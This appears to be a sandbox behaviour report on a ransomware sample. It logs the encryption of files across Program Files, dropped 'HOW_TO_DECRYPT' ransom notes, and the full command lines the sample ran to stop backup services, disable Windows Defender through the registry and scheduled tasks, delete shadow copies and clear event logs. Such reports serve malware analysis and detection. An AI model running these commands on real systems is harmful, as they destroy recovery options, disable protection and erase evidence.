| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\fi-fi\wPfq_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_EAAAABAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.StarClub\Assets\Sounds\StarsFlying_D.wav | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\178.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSectionMedTile.scale-400.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\plugin.js.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_DAAAAAwAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\wPfq_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs-nio2.xml.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Office\Emboss.scale-100.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\Folder.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_2017.209.105.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\UpsellContentDialogHeader.jpg | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\4774_24x24x32.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\uk-ua\ui-strings.js.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_KMS_Client-ul-oob.xrm-ms.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_IAAAACAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraWideTile.contrast-black_scale-100.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\LiveTile\W3.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.StarClub\Assets\ribbon.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\SharpDXEngine\Rendering\Shaders\Builtin\HLSL\Functions.fx | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\cc_16x11.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ko-kr\wPfq_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-compat_zh_CN.jar.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_BgAAAAYAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-200_8wekyb3d8bbwe\Assets\contrast-white\Logo.scale-200_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioStdR_OEM_Perp-ul-oob.xrm-ms.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemePreview\Effects\02.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\7656_24x24x32.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-white_targetsize-40_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fi-fi\wPfq_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\ja-JP\msdaprsr.dll.mui.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_DAAAAAwAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_zh_CN.jar.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Professional2019DemoR_BypassTrial180-ul-oob.xrm-ms.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_KgAAACoAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\VoiceRecorderWideTile.contrast-black_scale-125.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubWideTile.scale-100_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\LinkedInboxWideTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\main.css.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AgAAAAIAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\plugins\access\wPfq_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\TellMeWord.nrr.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_LAAAACwAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\cw_60x42.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\RTL\contrast-black\LargeTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-tw\ui-strings.js.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_JgAAACYAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp2-ul-phn.xrm-ms.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\whew.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_12b50" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_12b50" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_12b50" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
